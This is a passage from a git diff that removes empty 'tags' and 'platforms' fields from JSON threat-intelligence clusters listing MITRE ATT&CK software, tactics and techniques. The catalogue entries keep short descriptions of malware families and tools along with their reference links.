}, "related": [ @@ -21364,7 +21149,6 @@ ], "software_attack_id": "S0428", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21564,7 +21348,6 @@ ], "software_attack_id": "S0216", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21672,7 +21455,6 @@ ], "software_attack_id": "S1012", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21691,10 +21473,8 @@ { "description": "[Power Loader](https://app.tidalcyber.com/software/018ee1d9-35af-49dc-a667-11b77cd76f46) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. [[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)] [[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]", "meta": { - "platforms": [], "software_attack_id": "S0177", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21780,7 +21560,6 @@ ], "software_attack_id": "S0441", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -21985,7 +21764,6 @@ ], "software_attack_id": "S0371", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -22413,7 +22191,6 @@ ], "software_attack_id": "S0279", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -22474,7 +22251,6 @@ ], "software_attack_id": "S0238", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -22498,7 +22274,6 @@ ], "software_attack_id": "S0613", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -22746,7 +22521,6 @@ ], "software_attack_id": "S0078", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -22975,7 +22749,6 @@ ], "software_attack_id": "S0192", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -23329,7 +23102,6 @@ ], "software_attack_id": "S1076", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -23537,7 +23309,6 @@ ], "software_attack_id": "S0629", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -23561,7 +23332,6 @@ ], "software_attack_id": "S0458", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -23667,7 +23437,6 @@ ], "software_attack_id": "S0241", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -23691,7 +23460,6 @@ ], "software_attack_id": "S0364", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -23757,7 +23525,6 @@ ], "software_attack_id": "S0169", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24030,7 +23797,6 @@ ], "software_attack_id": "S0172", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24064,7 +23830,6 @@ ], "software_attack_id": "S0153", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24280,7 +24045,6 @@ ], "software_attack_id": "S0019", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24534,7 +24298,6 @@ ], "software_attack_id": "S0375", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24599,7 +24362,6 @@ ], "software_attack_id": "S0166", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24623,7 +24385,6 @@ ], "software_attack_id": "S0592", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -24675,7 +24436,6 @@ ], "software_attack_id": "S0125", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24743,7 +24503,6 @@ { "description": "Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]", "meta": { - "platforms": [], "software_attack_id": "S0174", "source": "MITRE", "tags": [ @@ -24781,7 +24540,6 @@ ], "software_attack_id": "S0379", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24916,7 +24674,6 @@ ], "software_attack_id": "S0433", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24940,7 +24697,6 @@ ], "software_attack_id": "S0003", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24964,7 +24720,6 @@ ], "software_attack_id": "S0448", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -24979,7 +24734,6 @@ { "description": "[ROADTools](https://app.tidalcyber.com/software/15bc8e94-64d1-4f1f-bc99-08cfbac417dc) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[[ROADtools Github](https://app.tidalcyber.com/references/90c592dc-2c9d-401a-96ab-b539f7522956)]", "meta": { - "platforms": [], "software_attack_id": "S0684", "source": "MITRE", "tags": [ @@ -25032,7 +24786,6 @@ ], "software_attack_id": "S0112", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25056,7 +24809,6 @@ ], "software_attack_id": "S0270", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25106,7 +24858,6 @@ ], "software_attack_id": "S1078", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25125,10 +24876,8 @@ { "description": "[route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af) can be used to find or change information within the local system IP routing table. [[TechNet Route](https://app.tidalcyber.com/references/0e483ec8-af40-4139-9711-53b999e069ee)]", "meta": { - "platforms": [], "software_attack_id": "S0103", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -25156,7 +24905,6 @@ ], "software_attack_id": "S0090", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25285,7 +25033,6 @@ ], "software_attack_id": "S0148", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25344,7 +25091,6 @@ ], "software_attack_id": "S0358", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -25526,7 +25272,6 @@ ], "software_attack_id": "S0253", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -25795,7 +25540,6 @@ ], "software_attack_id": "S1085", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26149,7 +25893,6 @@ ], "software_attack_id": "S0345", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26606,7 +26349,6 @@ ], "software_attack_id": "S1089", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26679,7 +26421,6 @@ ], "software_attack_id": "S0546", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26851,7 +26592,6 @@ ], "software_attack_id": "S0444", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26875,7 +26615,6 @@ ], "software_attack_id": "S0445", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -26894,10 +26633,8 @@ { "description": "[SHIPSHAPE](https://app.tidalcyber.com/software/3db0b464-ec5d-4cdd-86c2-62eac9c8acd6) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. [[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]", "meta": { - "platforms": [], "software_attack_id": "S0028", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26949,7 +26686,6 @@ ], "software_attack_id": "S0063", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -26976,10 +26712,8 @@ { "description": "[SHUTTERSPEED](https://app.tidalcyber.com/software/5b2d82a6-ed96-485d-bca9-2320590de890) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66). [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", "meta": { - "platforms": [], "software_attack_id": "S0217", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27055,7 +26789,6 @@ ], "software_attack_id": "S0692", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -27098,7 +26831,6 @@ ], "software_attack_id": "S0007", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27118,7 +26850,6 @@ ], "software_attack_id": "S0468", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27194,7 +26925,6 @@ ], "software_attack_id": "S0533", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27222,7 +26952,6 @@ ], "software_attack_id": "S0218", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27352,7 +27081,6 @@ ], "software_attack_id": "S1086", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27376,7 +27104,6 @@ ], "software_attack_id": "S0159", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27400,7 +27127,6 @@ ], "software_attack_id": "S0273", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27587,7 +27313,6 @@ ], "software_attack_id": "S0157", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27611,7 +27336,6 @@ ], "software_attack_id": "S0035", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27662,7 +27386,6 @@ ], "software_attack_id": "S0374", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -27860,10 +27583,8 @@ { "description": "[sqlmap](https://app.tidalcyber.com/software/96c224a6-6ca4-4ac1-9990-d863ec5a317a) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [[sqlmap Introduction](https://app.tidalcyber.com/references/ac643245-d54f-470f-a393-26875c0877c8)]", "meta": { - "platforms": [], "software_attack_id": "S0225", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -27923,7 +27644,6 @@ { "description": "[SQLRat](https://app.tidalcyber.com/software/612f780a-239a-4bd0-a29f-63beadf3ed22) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has been observed using it.[[Flashpoint FIN 7 March 2019](https://app.tidalcyber.com/references/b09453a3-c0df-4e96-b399-e7b34e068e9d)]", "meta": { - "platforms": [], "software_attack_id": "S0390", "source": "MITRE", "tags": [ @@ -28098,7 +27818,6 @@ ], "software_attack_id": "S0058", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28122,7 +27841,6 @@ ], "software_attack_id": "S0188", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28275,7 +27993,6 @@ ], "software_attack_id": "S0142", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28325,7 +28042,6 @@ ], "software_attack_id": "S0491", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28389,7 +28105,6 @@ ], "software_attack_id": "S0085", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28409,7 +28124,6 @@ ], "software_attack_id": "S1042", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28429,7 +28143,6 @@ ], "software_attack_id": "S1049", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28520,7 +28233,6 @@ ], "software_attack_id": "S0578", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28562,7 +28274,6 @@ ], "software_attack_id": "S0018", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28709,7 +28420,6 @@ ], "software_attack_id": "S0060", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -28867,7 +28577,6 @@ { "description": "[Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) is a Windows utility that can be used to gather detailed information about a computer. [[TechNet Systeminfo](https://app.tidalcyber.com/references/5462ba66-6e26-41c2-bc28-6c19085d4469)]", "meta": { - "platforms": [], "software_attack_id": "S0096", "source": "MITRE", "tags": [ @@ -28985,7 +28694,6 @@ ], "software_attack_id": "S0663", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29021,7 +28729,6 @@ ], "software_attack_id": "S0098", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29066,7 +28773,6 @@ ], "software_attack_id": "S0011", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29111,7 +28817,6 @@ ], "software_attack_id": "S0586", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29135,7 +28840,6 @@ ], "software_attack_id": "S0467", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29195,7 +28899,6 @@ ], "software_attack_id": "S1011", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29214,7 +28917,6 @@ { "description": "The [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. [[Microsoft Tasklist](https://app.tidalcyber.com/references/2c09561a-02ee-4948-9745-9d6c8eb2881d)]", "meta": { - "platforms": [], "software_attack_id": "S0057", "source": "MITRE", "tags": [ @@ -29344,7 +29046,6 @@ ], "software_attack_id": "S0164", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29706,7 +29407,6 @@ ], "software_attack_id": "S0665", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29820,7 +29520,6 @@ { "description": "[TINYTYPHON](https://app.tidalcyber.com/software/0e009cb8-848e-427a-9581-d3a4fd9f6a87) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. [[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]", "meta": { - "platforms": [], "software_attack_id": "S0131", "source": "MITRE", "tags": [ @@ -29849,7 +29548,6 @@ ], "software_attack_id": "S0004", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -29868,7 +29566,6 @@ { "description": "[Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) and [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6).[[Kaspersky Tomiris Sep 2021](https://app.tidalcyber.com/references/a881a7e4-a1df-4ad2-b67f-ef03caddb721)]", "meta": { - "platforms": [], "software_attack_id": "S0671", "source": "MITRE", "tags": [ @@ -29942,7 +29639,6 @@ ], "software_attack_id": "S0678", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30127,7 +29823,6 @@ ], "software_attack_id": "S0094", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30159,7 +29854,6 @@ ], "software_attack_id": "S0001", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30250,7 +29944,6 @@ ], "software_attack_id": "S0178", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30274,7 +29967,6 @@ ], "software_attack_id": "S0436", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30404,7 +30096,6 @@ ], "software_attack_id": "S0647", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30428,7 +30119,6 @@ ], "software_attack_id": "S0199", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30473,7 +30163,6 @@ { "description": "[UACMe](https://app.tidalcyber.com/software/5788edee-d1b7-4406-9122-bee596362236) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. [[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]", "meta": { - "platforms": [], "software_attack_id": "S0116", "source": "MITRE", "tags": [ @@ -30499,7 +30188,6 @@ ], "software_attack_id": "S0333", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30519,7 +30207,6 @@ ], "software_attack_id": "S0221", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30539,7 +30226,6 @@ ], "software_attack_id": "S0130", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30658,7 +30344,6 @@ ], "software_attack_id": "S0275", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -30863,7 +30548,6 @@ ], "software_attack_id": "S0452", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31041,7 +30725,6 @@ ], "software_attack_id": "S0207", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31106,7 +30789,6 @@ ], "software_attack_id": "S0442", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31171,7 +30853,6 @@ ], "software_attack_id": "S0257", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31258,7 +30939,6 @@ ], "software_attack_id": "S0180", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31767,7 +31447,6 @@ ], "software_attack_id": "S0579", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -31982,7 +31661,6 @@ ], "software_attack_id": "S0206", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32069,10 +31747,8 @@ { "description": "[WINDSHIELD](https://app.tidalcyber.com/software/ed50dcf7-e283-451e-95b1-a8485f8dd214) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). [[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]", "meta": { - "platforms": [], "software_attack_id": "S0155", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32096,7 +31772,6 @@ ], "software_attack_id": "S0466", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32115,10 +31790,8 @@ { "description": "[WINERACK](https://app.tidalcyber.com/software/5f994df7-55b0-4383-8ebc-506d4987292a) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66). [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", "meta": { - "platforms": [], "software_attack_id": "S0219", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32137,10 +31810,8 @@ { "description": "[Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is a lightweight, open source tool similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) designed to allow system administrators to execute commands on remote servers. [[Winexe Github Sept 2013](https://app.tidalcyber.com/references/7003e2d4-83e5-4672-aaa9-53cc4bcb08b5)] [Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is unique in that it is a GNU/Linux based client. [[Überwachung APT28 Forfiles June 2015](https://app.tidalcyber.com/references/3b85fff0-88d8-4df6-af0b-66e57492732e)]", "meta": { - "platforms": [], "software_attack_id": "S0191", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -32172,7 +31843,6 @@ ], "software_attack_id": "S0176", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32237,7 +31907,6 @@ ], "software_attack_id": "S0059", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32261,7 +31930,6 @@ ], "software_attack_id": "S0430", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32289,7 +31957,6 @@ ], "software_attack_id": "S0141", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32451,7 +32118,6 @@ { "description": "[Wiper](https://app.tidalcyber.com/software/627e05c2-c02e-433e-9288-c2d78bce156f) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. [[Dell Wiper](https://app.tidalcyber.com/references/be6629ef-e7c6-411c-9bd2-34e59062cadd)]", "meta": { - "platforms": [], "software_attack_id": "S0041", "source": "MITRE", "tags": [ @@ -32607,7 +32273,6 @@ ], "software_attack_id": "S1065", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32898,7 +32563,6 @@ ], "software_attack_id": "S0161", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32927,7 +32591,6 @@ ], "software_attack_id": "S0341", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32947,7 +32610,6 @@ ], "software_attack_id": "S0653", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -32966,10 +32628,8 @@ { "description": "[xCmd](https://app.tidalcyber.com/software/d943d3d9-3a99-464f-94f0-95aa7963d858) is an open source tool that is similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and allows the user to execute applications on remote systems. [[xCmd](https://app.tidalcyber.com/references/430fc6ef-33c5-4cd8-b785-358e4aae5230)]", "meta": { - "platforms": [], "software_attack_id": "S0123", "source": "MITRE", - "tags": [], "type": "tool" }, "related": [ @@ -33181,7 +32841,6 @@ ], "software_attack_id": "S0117", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -33345,10 +33004,8 @@ { "description": "[Zeroaccess](https://app.tidalcyber.com/software/2f52b513-5293-4833-9c4d-b120e7a84341) is a kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [[Sophos ZeroAccess](https://app.tidalcyber.com/references/41b51767-62f1-45c2-98cb-47c44c975a58)]", "meta": { - "platforms": [], "software_attack_id": "S0027", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -33457,7 +33114,6 @@ ], "software_attack_id": "S0086", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -33519,7 +33175,6 @@ ], "software_attack_id": "S0672", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ @@ -33633,7 +33288,6 @@ ], "software_attack_id": "S1013", "source": "MITRE", - "tags": [], "type": "malware" }, "related": [ diff --git a/clusters/tidal-tactic.json b/clusters/tidal-tactic.json index ff4bdd9..4db9606 100644 --- a/clusters/tidal-tactic.json +++ b/clusters/tidal-tactic.json @@ -12,8 +12,7 @@ "meta": { "ordinal_position": 1, "source": "MITRE", - "tactic_attack_id": "TA0043", - "tags": [] + "tactic_attack_id": "TA0043" }, "related": [ { @@ -201,8 +200,7 @@ "meta": { "ordinal_position": 2, "source": "MITRE", - "tactic_attack_id": "TA0042", - "tags": [] + "tactic_attack_id": "TA0042" }, "related": [ { @@ -394,8 +392,7 @@ "meta": { "ordinal_position": 3, "source": "MITRE", - "tactic_attack_id": "TA0001", - "tags": [] + "tactic_attack_id": "TA0001" }, "related": [ { @@ -491,8 +488,7 @@ "meta": { "ordinal_position": 4, "source": "MITRE", - "tactic_attack_id": "TA0002", - "tags": [] + "tactic_attack_id": "TA0002" }, "related": [ { @@ -648,8 +644,7 @@ "meta": { "ordinal_position": 5, "source": "MITRE", - "tactic_attack_id": "TA0003", - "tags": [] + "tactic_attack_id": "TA0003" }, "related": [ { @@ -1121,8 +1116,7 @@ "meta": { "ordinal_position": 6, "source": "MITRE", - "tactic_attack_id": "TA0004", - "tags": [] + "tactic_attack_id": "TA0004" }, "related": [ { @@ -1550,8 +1544,7 @@ "meta": { "ordinal_position": 7, "source": "MITRE", - "tactic_attack_id": "TA0005", - "tags": [] + "tactic_attack_id": "TA0005" }, "related": [ { @@ -2327,8 +2320,7 @@ "meta": { "ordinal_position": 8, "source": "MITRE", - "tactic_attack_id": "TA0006", - "tags": [] + "tactic_attack_id": "TA0006" }, "related": [ { @@ -2596,8 +2588,7 @@ "meta": { "ordinal_position": 9, "source": "MITRE", - "tactic_attack_id": "TA0007", - "tags": [] + "tactic_attack_id": "TA0007" }, "related": [ { @@ -2793,8 +2784,7 @@ "meta": { "ordinal_position": 10, "source": "MITRE", - "tactic_attack_id": "TA0008", - "tags": [] + "tactic_attack_id": "TA0008" }, "related": [ { @@ -2898,8 +2888,7 @@ "meta": { "ordinal_position": 11, "source": "MITRE", - "tactic_attack_id": "TA0009", - "tags": [] + "tactic_attack_id": "TA0009" }, "related": [ { @@ -3059,8 +3048,7 @@ "meta": { "ordinal_position": 12, "source": "MITRE", - "tactic_attack_id": "TA0011", - "tags": [] + "tactic_attack_id": "TA0011" }, "related": [ { @@ -3232,8 +3220,7 @@ "meta": { "ordinal_position": 13, "source": "MITRE", - "tactic_attack_id": "TA0010", - "tags": [] + "tactic_attack_id": "TA0010" }, "related": [ { @@ -3321,8 +3308,7 @@ "meta": { "ordinal_position": 14, "source": "MITRE", - "tactic_attack_id": "TA0040", - "tags": [] + "tactic_attack_id": "TA0040" }, "related": [ { diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index 2140816..0fde8d2 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -114,8 +114,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -251,8 +250,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -297,8 +295,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -382,8 +379,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -539,8 +535,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -585,8 +580,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -723,8 +717,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -818,8 +811,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -908,8 +900,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1004,8 +995,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1040,8 +1030,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1105,8 +1094,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1137,8 +1125,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1159,8 +1146,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1195,8 +1181,7 @@ "Network", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1217,8 +1202,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1507,8 +1491,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1682,8 +1665,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1726,8 +1708,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1746,8 +1727,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1764,8 +1744,7 @@ "platforms": [ "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1851,8 +1830,7 @@ "SaaS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1885,8 +1863,7 @@ "platforms": [ "Containers" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1905,8 +1882,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1924,8 +1900,7 @@ "Azure AD", "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1942,8 +1917,7 @@ "platforms": [ "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1963,8 +1937,7 @@ "IaaS", "Office 365" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -1985,8 +1958,7 @@ "Office 365", "SaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2003,8 +1975,7 @@ "platforms": [ "IaaS" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2163,8 +2134,7 @@ "Office 365", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2219,8 +2189,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2282,8 +2251,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2314,8 +2282,7 @@ "macOS", "Windows" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2437,8 +2404,7 @@ "platforms": [ "PRE" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { @@ -2483,8 +2449,7 @@ "platforms": [ "Containers" ], - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [ { 